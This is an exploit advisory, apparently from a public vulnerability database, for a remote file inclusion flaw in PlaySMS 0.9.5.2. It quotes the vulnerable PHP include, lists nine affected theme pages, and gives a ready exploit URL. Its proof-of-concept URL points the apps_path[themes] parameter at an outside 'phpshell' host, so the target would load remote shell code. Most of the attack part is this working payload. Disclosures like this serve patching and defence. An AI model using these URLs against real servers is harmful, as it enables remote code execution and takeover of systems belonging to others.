PlaySMS 0.9.5.2 Remote File Inclusion

Published
Credit
Risk
2011.09.07
NoGe
High
CWE
CVE
Local
Remote
N/A
N/A
No
Yes

=============================================================================================================

[o] PlaySMS <= Remote File Inclusion Vulnerability

Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

=============================================================================================================

[o] Vulnerability

<?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>

affected all this files

web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php


[o] Exploit

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


[o] PoC

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

=============================================================================================================

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

[o] September 05 2011 - Papua, Indonesia



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com